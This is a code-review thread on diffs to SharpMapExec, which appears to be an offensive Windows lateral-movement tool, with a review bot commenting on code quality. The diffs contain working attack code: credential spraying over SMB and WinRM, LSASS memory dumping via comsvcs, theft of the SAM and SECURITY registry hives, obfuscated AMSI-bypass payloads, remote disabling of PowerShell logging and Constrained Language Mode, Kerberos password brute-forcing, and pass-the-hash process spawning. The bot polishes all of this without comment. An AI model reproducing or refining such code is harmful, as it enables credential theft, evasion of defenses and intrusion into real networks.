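Review bot: The `cim` arm in the ClearText branch of `StartJob` creates one `CimSession` per host and never disposes it, and the NTHash branch has no `cim` arm at all, so if that combination can reach this method it prints the banner and then silently does nothing. `CimSession` is `IDisposable`, so the session should be scoped, `using (CimSession cimSession = Cim.newSession(computername, domain, user, password, flags.Contains("impersonate")))`, and both branches should end in an `else` that reports an unsupported protocol. Both branches also echo the password or NT hash with `Console.WriteLine(string.Format("[*] secret: {0}", password));`, which leaves the credential in terminal scrollback and in any captured output; printing a masked value would avoid that. The repeated `protocol.ToLower() == "..."` tests would read better as `string.Equals(protocol, "smb", StringComparison.OrdinalIgnoreCase)`.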
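--- a/SharpMapExec/Lib/NtlmSmb.cs
+++ b/SharpMapExec/Lib/NtlmSmb.cs
@@ -1,94 +0,0 @@
-using SharpMapExec.Helpers;
-using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
-using System.Threading.Tasks;
-using static SharpMapExec.Helpers.SecurityContext;
-
-namespace SharpMapExec.Lib
-{
- public class ntlmsmb
- {
- public static void NtlmSmb<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument)
- {
- //StartJob(users, domain, secrets, computernames, module, moduleargument);
- var listOfTasks = new List<Task>();
- listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument)));
- Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
- }
-
- public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument)
- {
- string[] passwords;
- if (typeof(T) == typeof(NTHash))
- {
- passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
- foreach (string user in users)
- {
- foreach (string password in passwords)
- {
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", password));
- Console.WriteLine();
- SetThreadToken(user, domain, password);
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 445))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- Smb.CheckLocalAdmin(computername, module);
- Console.WriteLine("");
- }
- }
- }
- }
- else if (typeof(T) == typeof(ClearText))
- {
- passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
- foreach (string user in users)
- {
- foreach (string password in passwords)
- {
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", password));
- Console.WriteLine();
- using (new Impersonator.Impersonation(domain, user, password))
- {
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 445))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- Smb.CheckSMBVersion(computername);
- Smb.CheckOsVersion(computername);
- Smb.CheckLocalAdmin(computername, module);
- Console.WriteLine("");
- }
- }
- }
- }
- }
- }
- }
-}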
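--- a/SharpMapExec/Lib/NtlmWinrm.cs
+++ b/SharpMapExec/Lib/NtlmWinrm.cs
@@ -1,158 +0,0 @@
-using SharpMapExec.Helpers;
-using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
-using System.Threading.Tasks;
-using static SharpMapExec.Helpers.SecurityContext;
-
-namespace SharpMapExec.Lib
-{
- public class ntlmwinrm
- {
- public static void NtlmWinRm<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument,string path, string destination, List<string> flags)
- {
- if (module.Contains("exec") && moduleargument.Length == 0)
- {
- Console.WriteLine("[-] Missing exec argument");
- return;
- }
- if (module.Contains("assembly") && !File.Exists(path))
- {
- Console.WriteLine("[-] Missing assembly path");
- return;
- }
- if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
- {
- Console.WriteLine("[-] Need path and destination");
- return;
- }
- if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
- {
- Console.WriteLine("[-] Need path and destination");
- return;
- }
- //StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags);
- var listOfTasks = new List<Task>();
- listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags)));
- Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
- }
-
- public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
- {
- string[] passwords;
- if (typeof(T) == typeof(NTHash))
- {
- passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
- foreach (string user in users)
- {
- foreach (string password in passwords)
- {
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", password));
- Console.WriteLine();
- SetThreadToken(user, domain, password);
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 5985))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- if (module.Length == 0 || module.Contains("exec"))
- {
- Wsman.CheckLocalAdmin(computername, moduleargument, flags);
- }
- else if (module.Contains("comsvcs"))
- {
- Wsman.InvokeComSvcsLsassDump(computername);
- }
- else if (module.Contains("secrets") || module.Contains("secret"))
- {
- Wsman.GetSecrets(computername);
- }
- else if (module.Contains("assembly"))
- {
- Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
- }
- else if (module.Contains("download"))
- {
- Wsman.CopyFile(computername, path, destination);
- }
- else if (module.Contains("upload"))
- {
- Wsman.UploadFile(computername, path, destination);
- }
- Console.WriteLine("");
- }
- }
- }
- }
- else if (typeof(T) == typeof(ClearText))
- {
- passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
- foreach (string user in users)
- {
- foreach (string password in passwords)
- {
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", password));
- Console.WriteLine();
- using (new Impersonator.Impersonation(domain, user, password))
- {
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 5985))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- if (module.Length == 0 || module.Contains("exec"))
- {
- Wsman.CheckLocalAdmin(computername, moduleargument, flags);
- }
- else if (module.Contains("comsvcs"))
- {
- Wsman.InvokeComSvcsLsassDump(computername);
- }
- else if (module.Contains("secrets") || module.Contains("secret"))
- {
- Wsman.GetSecrets(computername);
- }
- else if (module.Contains("assembly"))
- {
- Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
- }
- else if (module.Contains("download"))
- {
- Wsman.CopyFile(computername, path, destination);
- }
- else if (module.Contains("upload"))
- {
- Wsman.UploadFile(computername, path, destination);
- }
- Console.WriteLine("");
- }
- }
- }
- }
- }
- }
- }
-}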
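--- a/SharpMapExec/Lib/Reg32.cs
+++ b/SharpMapExec/Lib/Reg32.cs
@@ -0,0 +1,207 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using Microsoft.Win32;
+
+namespace SharpMapExec.Lib
+{
+ class Reg32
+ {
+
+ public static bool CheckLocalAdmin(string computername)
+ {
+ try
+ {
+ RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, computername);
+ string[] subkeys = environmentKey.OpenSubKey("SOFTWARE").GetValueNames();
+ Console.WriteLine(String.Format(" [+] Local Admin on {0}", computername));
+ return true;
+ }
+ catch (System.UnauthorizedAccessException e)
+ {
+ Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
+ return false;
+ }
+ }
+
+ public static bool regValueExists(string computername, RegistryHive hive, string subKeyName, string keyName)
+ {
+ try
+ {
+ RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
+ string[] subkeys = environmentKey.OpenSubKey(subKeyName).GetValueNames();
+ string value = subkeys.FirstOrDefault(item => item.Contains(keyName));
+ environmentKey.Close();
+ if (string.IsNullOrEmpty(value))
+ {
+ return false;
+ }
+ else
+ {
+ return true;
+ }
+ }
+ catch (System.UnauthorizedAccessException e)
+ {
+ Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
+ return false;
+ }
+ catch (Exception e)
+ {
+ //Console.WriteLine("[-] {0}", e.ToString());
+ return false;
+ }
+ }
+
+ public static string readRegValue(string computername, RegistryHive hive, string subKeyName, string keyName)
+ {
+ try
+ {
+ RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
+ string value = (string)environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
+ environmentKey.Close();
+ return value;
+ }
+ catch (System.UnauthorizedAccessException e)
+ {
+ Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
+ return "";
+ }
+ catch (Exception e)
+ {
+ //Console.WriteLine("[-] {0}", e.ToString());
+ return "";
+ }
+ }
+
+ public static bool setRegValue(string computername, RegistryHive hive, string subKeyName, string keyName, string valueName, RegistryValueKind valueKind)
+ {
+ try
+ {
+ RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername).OpenSubKey(subKeyName, true);
+ environmentKey.SetValue(keyName, valueName, valueKind);
+ environmentKey.Close();
+ if (readRegValue(computername, hive, subKeyName, keyName) == valueName)
+ {
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+ catch (System.UnauthorizedAccessException e)
+ {
+ Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
+ return false;
+ }
+ catch (Exception e)
+ {
+ //Console.WriteLine("[-] {0}", e.ToString());
+ return false;
+ }
+ }
+
+ public static void disable_pslockdown(string computername)
+ {
+ if (!regValueExists(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy"))
+ {
+ Console.WriteLine("[*] CLM not enabled");
+ return;
+ }
+
+ string value = readRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
+ Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
+
+ if(value == "8")
+ {
+ return;
+ }
+
+ bool result = setRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "8", RegistryValueKind.String);
+ if (result)
+ {
+ Console.WriteLine(" [+] Constrained Language Mode Disabled");
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Disable Constrained Language Mode");
+ }
+ }
+
+ public static void check_pslockdown(string computername)
+ {
+ if (!regValueExists(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy"))
+ {
+ Console.WriteLine("[*] CLM not enabled");
+ return;
+ }
+
+ string value = readRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
+ Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
+ }
+
+ public static void disable_pslogging(string computername)
+ {
+ Dictionary<string, string> keys = new Dictionary<string, string>
+ {
+ { "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
+ { "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
+ { "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ { "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ };
+ foreach (var key in keys)
+ {
+ if (!regValueExists(computername, RegistryHive.LocalMachine, key.Value, key.Key))
+ {
+ Console.WriteLine("[*] {0} not enabled", key.Key);
+ continue;
+ }
+
+ string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
+ Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
+
+ if(value == "0")
+ {
+ continue;
+ }
+
+ bool result = setRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key, "0", RegistryValueKind.DWord);
+ if (result)
+ {
+ Console.WriteLine(" [+] {0} Disabled", key.Key);
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Disable {0}", key.Key);
+ }
+ }
+ }
+
+ public static void check_pslogging(string computername)
+ {
+ Dictionary<string, string> keys = new Dictionary<string, string>
+ {
+ { "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
+ { "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
+ { "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ { "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ };
+ foreach (var key in keys)
+ {
+ if (!regValueExists(computername, RegistryHive.LocalMachine, key.Value, key.Key))
+ {
+ Console.WriteLine("[*] {0} not enabled", key.Key);
+ continue;
+ }
+
+ string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
+ Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
+
+ }
+ }
+ }
+}
+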
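Review bot: The registry helpers leak their remote handles on every error path and dereference `OpenSubKey(...)` without a null check. `OpenSubKey` returns null when the subkey is absent, so `regValueExists` and `readRegValue` throw `NullReferenceException`, which the empty `catch (Exception e)` turns into `false` or `""` that callers cannot tell apart from a real answer; `CheckLocalAdmin` never closes `environmentKey`, and `setRegValue` drops the base key returned by `OpenRemoteBaseKey`. `regValueExists` also matches with `item.Contains(keyName)`, so any value whose name merely contains the requested name counts as present. Separately, `(string)...GetValue(keyName)` in `readRegValue` throws for non-string data, so values read back for the `RegistryValueKind.DWord` entries are presumably always reported as empty. The rewrite of `regValueExists` below scopes both keys with `using`, returns early on a missing subkey, compares names exactly and surfaces the swallowed error; the other helpers would follow the same shape.

```csharp
public static bool regValueExists(string computername, RegistryHive hive, string subKeyName, string keyName)
{
    try
    {
        using (RegistryKey baseKey = RegistryKey.OpenRemoteBaseKey(hive, computername))
        using (RegistryKey subKey = baseKey.OpenSubKey(subKeyName))
        {
            if (subKey == null)
            {
                return false;
            }
            return subKey.GetValueNames().Any(item => string.Equals(item, keyName, StringComparison.OrdinalIgnoreCase));
        }
    }
    // … unchanged: UnauthorizedAccessException handler …
    catch (Exception e)
    {
        Console.WriteLine("[-] {0}", e.Message);
        return false;
    }
}
```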
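--- a/SharpMapExec/Lib/Scan.cs
+++ b/SharpMapExec/Lib/Scan.cs
@@ -0,0 +1,177 @@
+using Microsoft.Management.Infrastructure;
+using SharpMapExec.Helpers;
+using System;
+using System.Collections.Generic;
+using System.IO;
+
+namespace SharpMapExec.Lib
+{
+ internal class Scan
+ {
+ public static void SMB(string[] computernames, string module)
+ {
+ foreach (string computername in computernames)
+ {
+ try
+ {
+ Console.WriteLine(String.Format("[*] Checking {0}", computername));
+ if (!Misc.CheckHostPort(computername, 445))
+ {
+ Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
+ Console.WriteLine();
+ continue;
+ }
+ if (!Directory.Exists(Path.Combine("loot", computername)))
+ {
+ Directory.CreateDirectory(Path.Combine("loot", computername));
+ }
+ Smb.CheckSMBVersion(computername);
+ Smb.CheckOsVersion(computername);
+ Smb.CheckLocalAdmin(computername, module);
+ Console.WriteLine("");
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine("[-] {0}:445 - {1}", computername, e.ToString());
+ }
+ }
+ }
+
+ public static void WINRM(string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
+ {
+ foreach (string computername in computernames)
+ {
+ try
+ {
+ Console.WriteLine(String.Format("[*] Checking {0}", computername));
+ if (!Misc.CheckHostPort(computername, 5985))
+ {
+ Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
+ Console.WriteLine();
+ continue;
+ }
+ if (module.Length == 0 || module.Contains("exec"))
+ {
+ Wsman.CheckLocalAdmin(computername, moduleargument, flags);
+ }
+ else if (module.Contains("comsvcs"))
+ {
+ Wsman.InvokeComSvcsLsassDump(computername);
+ }
+ else if (module.Contains("secrets") || module.Contains("secret"))
+ {
+ Wsman.GetSecrets(computername);
+ }
+ else if (module.Contains("assembly"))
+ {
+ Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
+ }
+ else if (module.Contains("download"))
+ {
+ Wsman.CopyFile(computername, path, destination);
+ }
+ else if (module.Contains("upload"))
+ {
+ Wsman.UploadFile(computername, path, destination);
+ }
+ Console.WriteLine("");
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine("[-] {0}:5985 - {1}", computername, e.ToString());
+ }
+ }
+ }
+
+ public static void CIM(CimSession cimSession, string module)
+ {
+ try
+ {
+ Console.WriteLine(String.Format("[*] Checking {0}", cimSession.ComputerName));
+ if (!cimSession.TestConnection(out CimInstance instance, out CimException exception))
+ {
+ Console.WriteLine(String.Format("[-] Could Not Reach {0} - {1}", cimSession.ComputerName, exception));
+ Console.WriteLine();
+ return;
+ }
+ if (module.Length == 0)
+ {
+ Cim.CheckLocalAdmin(cimSession);
+ }
+ else if (module.Contains("enable_winrm"))
+ {
+ Cim.enable_winrm(cimSession);
+ }
+ else if (module.Contains("disable_winrm"))
+ {
+ Cim.disable_winrm(cimSession);
+ }
+ else if (module.Contains("check_pslockdown"))
+ {
+ Cim.check_pslockdown(cimSession);
+ }
+ else if (module.Contains("check_pslogging"))
+ {
+ Cim.check_pslogging(cimSession);
+ }
+ else if (module.Contains("disable_pslockdown"))
+ {
+ Cim.disable_pslockdown(cimSession);
+ }
+ else if (module.Contains("disable_pslogging"))
+ {
+ Cim.disable_pslogging(cimSession);
+ }
+ Console.WriteLine("");
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine("[-] {0} - {1}", cimSession.ComputerName, e.ToString());
+ }
+ }
+
+ public static void REG32(string[] computernames, string module)
+ {
+ foreach (string computername in computernames)
+ {
+ Console.WriteLine(module);
+
+ try
+ {
+ Console.WriteLine(String.Format("[*] Checking {0}", computername));
+ if (!Misc.CheckHostPort(computername, 445))
+ {
+ Console.WriteLine(String.Format("[-] Could Not Reach {0}:135", computername));
+ Console.WriteLine();
+ continue;
+ }
+ if (!Reg32.CheckLocalAdmin(computername))
+ {
+ continue;
+ }
+ else if (module.Contains("check_pslockdown"))
+ {
+ Reg32.check_pslockdown(computername);
+ }
+ else if (module.Contains("check_pslogging"))
+ {
+ Reg32.check_pslogging(computername);
+ }
+ else if (module.Contains("disable_pslockdown"))
+ {
+ Reg32.disable_pslockdown(computername);
+ }
+ else if (module.Contains("disable_pslogging"))
+ {
+ Reg32.disable_pslogging(computername);
+ }
+ Console.WriteLine("");
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine("[-] {0} - {1}", computername, e.ToString());
+ }
+ }
+ }
+ }
+}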
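Review bot: `REG32` probes TCP 445 with `Misc.CheckHostPort(computername, 445)` but reports `Could Not Reach {0}:135` when the probe fails, so the message names a port that was never tested; the two should agree, e.g. `Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));`. The same loop opens with a leftover `Console.WriteLine(module);` that prints the raw module string once per host and looks like debug output. All four methods dispatch with `module.Contains(...)`, so an unrecognised module falls through every arm and only prints a blank line; a final `else` that names the unknown module would make typos visible. The catch blocks print `e.ToString()`, which emits a full stack trace per failing host, where `e.Message` would keep the output readable.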
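--- a/SharpMapExec/Lib/Wsman.cs
+++ b/SharpMapExec/Lib/Wsman.cs
@@ -113,11 +113,11 @@
  using (var powershell = PowerShell.Create())
  {
  powershell.Runspace = runspace;
+ powershell.AddScript("if(get-module psreadline -all){remove-module psreadline -Force}");
  if (AmsiBypass)
  {
  string amsi = AmsiFail.GetPayload();
  powershell.AddScript(amsi);
- //powershell.AddScript("[Ref].Assembly.GetType('System.Management.Automation.' + ([char]65) + 'm' + 's' + ($PSHOmE[4]) + 'Utils').GetField('a' + 'm' + 's' + 'i' + 'InitFailed','NonPublic,Static').SetValue(0,[bool]1)");
  }
  powershell.AddScript(argument);
  result = powershell.Invoke();
@@ -228,15 +228,18 @@
  }
  try
  {
- string data = Compress(File.ReadAllBytes(path));
+ byte[] binary = File.ReadAllBytes(path);
+ string data = Compress(binary);
  (Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, PsFunction.UploadFile(data, destination), false, auth, scheme, true);
  foreach (PSObject obj in result)
  {
  if (obj.ToString().Length == 0)
  {
  Console.WriteLine(" [-] Upload Failed");
+ return;
  }
  }
+ Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", binary.ToArray().Length, destination));
  }
  catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
  {
@@ -322,18 +325,19 @@
 
  if (flags.Contains("system"))
  {
- caller = PsFunction.RunAsSystem(randomPath);
- UploadContent(computer, command, randomPath, auth, scheme);
+ caller = PsFunction.RunAsSystem(command);
  }
  else if (flags.Contains("delegwalk"))
  {
- caller = PsFunction.RunDelegationWalk(randomPath);
- UploadContent(computer, command, randomPath, auth, scheme);
+ caller = PsFunction.RunDelegationWalk(command);
  }
  else
  {
  caller = command;
  }
+
+ //Console.WriteLine(command);
+ //Console.WriteLine(caller);
 
  try
  {
@@ -376,6 +380,10 @@
  string argument = string.Format(@"start-process powershell -WindowStyle Hidden -ArgumentList '-NoP -enc {0} ' -wait ; test-path {1}", Convert.ToBase64String(Encoding.Unicode.GetBytes(ecmd)), path);
  //string argument = "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\windows\\temp\\Coredump.dmp full; Wait-Process rundll32";
  string destination = Path.Combine("loot", computer, "lsass.dmp");
+ if (!Directory.Exists(Path.Combine("loot", computer)))
+ {
+ Directory.CreateDirectory(Path.Combine("loot", computer));
+ }
  try
  {
  (Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, argument, false, auth, scheme);
@@ -422,6 +430,10 @@
  string sam = Path.Combine(destination, "sam.hive");
  string sys = Path.Combine(destination, "system.hive");
  string sec = Path.Combine(destination, "security.hive");
+ if (!Directory.Exists(Path.Combine("loot", computer)))
+ {
+ Directory.CreateDirectory(Path.Combine("loot", computer));
+ }
 
  //Get registry hives
  try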
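Review bot: In the upload hunk the new success line labels a byte count as kilobytes: `binary.ToArray().Length` is the file size in bytes, and `ToArray()` copies the whole buffer only to read its length. `Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", binary.Length / 1024, destination));` fixes both, or keep `binary.Length` and change the label to `bytes`. The two later hunks add the same `if (!Directory.Exists(...)) { Directory.CreateDirectory(...); }` guard; `Directory.CreateDirectory` already does nothing when the directory exists, so a single `Directory.CreateDirectory(Path.Combine("loot", computer));` is enough, and the duplicate could live in one helper. The enclosing methods start and end outside the visible hunks.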
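--- a/SharpMapExec/Projects/Rubeus/lib/Bruteforcer.cs
+++ b/SharpMapExec/Projects/Rubeus/lib/Bruteforcer.cs
@@ -3,21 +3,20 @@
 
 namespace Rubeus
 {
+
  public interface IBruteforcerReporter
  {
- void ReportValidPassword(string domain, string username, string password, byte[] ticket);
-
+ void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE);
  void ReportValidUser(string domain, string username);
-
  void ReportInvalidUser(string domain, string username);
-
  void ReportBlockedUser(string domain, string username);
-
  void ReportKrbError(string domain, string username, KRB_ERROR krbError);
  }
 
+
  public class Bruteforcer
  {
+
  private string domain;
  private string dc;
  private IBruteforcerReporter reporter;
@@ -64,7 +63,7 @@
  }
  catch (KerberosErrorException ex)
  {
- this.HandleKerberosError(ex, username);
+ return this.HandleKerberosError(ex, username, password);
  }
 
  return false;
@@ -73,7 +72,7 @@
  private void GetUsernamePasswordTGT(string username, string password)
  {
  Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
- string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower());
+ string salt = String.Format("{0}{1}", domain.ToUpper(), username);
 
  // special case for computer account salts
  if (username.EndsWith("$"))
@@ -90,42 +89,47 @@
  this.ReportValidPassword(username, password, TGT);
  }
 
- private void HandleKerberosError(KerberosErrorException ex, string username)
+ private bool HandleKerberosError(KerberosErrorException ex, string username, string password)
  {
+
+
  KRB_ERROR krbError = ex.krbError;
+ bool ret = false;
 
  switch ((Interop.KERBEROS_ERROR)krbError.error_code)
  {
  case Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_FAILED:
  this.ReportValidUser(username);
  break;
-
  case Interop.KERBEROS_ERROR.KDC_ERR_C_PRINCIPAL_UNKNOWN:
  this.ReportInvalidUser(username);
  break;
-
  case Interop.KERBEROS_ERROR.KDC_ERR_CLIENT_REVOKED:
  this.ReportBlockedUser(username);
  break;
-
  case Interop.KERBEROS_ERROR.KDC_ERR_ETYPE_NOTSUPP:
  this.ReportInvalidEncryptionType(username, krbError);
  break;
-
+ case Interop.KERBEROS_ERROR.KDC_ERR_KEY_EXPIRED:
+ this.ReportValidPassword(username, password, null, (Interop.KERBEROS_ERROR)krbError.error_code);
+ ret = true;
+ break;
  default:
  this.ReportKrbError(username, krbError);
  throw ex;
  }
+ return ret;
  }
 
- private void ReportValidPassword(string username, string password, byte[] ticket)
+ private void ReportValidPassword(string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
  {
+
  validCredentials.Add(username, password);
  if (!validUsers.ContainsKey(username))
  {
  validUsers.Add(username, true);
  }
- this.reporter.ReportValidPassword(this.domain, username, password, ticket);
+ this.reporter.ReportValidPassword(this.domain, username, password, ticket, err);
  }
 
  private void ReportValidUser(string username)
@@ -168,5 +172,7 @@
  {
  this.reporter.ReportKrbError(this.domain, username, krbError);
  }
+
  }
 }
+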
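Review bot: The new `KDC_ERR_KEY_EXPIRED` case in `HandleKerberosError` calls `ReportValidPassword(username, password, null, ...)`, so `IBruteforcerReporter.ReportValidPassword` can now be handed a null `ticket`, and the interface carries no comment saying so. The reporter implementations are not in this section; any of them that reads `ticket` without a null check would throw on this path. I would document the contract on the interface method, e.g. `/// <param name="ticket">TGT bytes; null when err is not KDC_ERR_NONE.</param>`, and have implementers branch on `err` before touching `ticket`. The optional `err` default is also bound at the call site from the declared type, so an explicit overload would be less surprising than a default value on an interface member.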
  • ■ ■ ■ ■ ■ ■
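--- a/SharpMapExec/Projects/SharpKatz/Module/Ptp.cs
+++ b/SharpMapExec/Projects/SharpKatz/Module/Ptp.cs
@@ -4,10 +4,13 @@
 // License: BSD 3-Clause
 //
 
+using Microsoft.Win32.SafeHandles;
 using SharpKatz.Credential;
 using System;
 using System.Collections.Generic;
+using System.IO;
 using System.Runtime.InteropServices;
+using System.Text;
 using static SharpKatz.Module.SharpKerberos;
 using static SharpKatz.Win32.Natives;
 
@@ -115,8 +118,31 @@
  }
  else if (!string.IsNullOrEmpty(user))
  {
+ //pipe for stdin and stdout
+ var saHandles = new SECURITY_ATTRIBUTES();
+ saHandles.nLength = Marshal.SizeOf(saHandles);
+ saHandles.bInheritHandle = true;
+ saHandles.lpSecurityDescriptor = IntPtr.Zero;
+ IntPtr hStdOutRead;
+ IntPtr hStdOutWrite;
+ IntPtr hStdInRead;
+ IntPtr hStdInWrite;
+ // StdOut pipe
+ CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 999999);
+ SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0);
+ // StdIn pipe
+ CreatePipe(out hStdInRead, out hStdInWrite, ref saHandles, 999999);
+ SetHandleInformation(hStdInWrite, HANDLE_FLAGS.INHERIT, 0);
+ //
  PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
- if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
+ STARTUPINFOEX si = new STARTUPINFOEX();
+ si.StartupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFOEX));
+ si.StartupInfo.hStdInput = hStdInRead;
+ si.StartupInfo.hStdErr = hStdOutWrite;
+ si.StartupInfo.hStdOutput = hStdOutWrite;
+ si.StartupInfo.dwFlags = 0x00000001 | 0x00000100;
+ si.StartupInfo.wShowWindow = 0x0000;
+ if (!Win32.Natives.CreateProcessWithLogonW(user, "", domain, LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\cmd.exe", @"C:\Windows\System32\cmd.exe", CreationFlags.CREATE_SUSPENDED, 0, @"C:\Windows\System32\", ref si, out pi))
  {
  procid = pi.dwProcessId;
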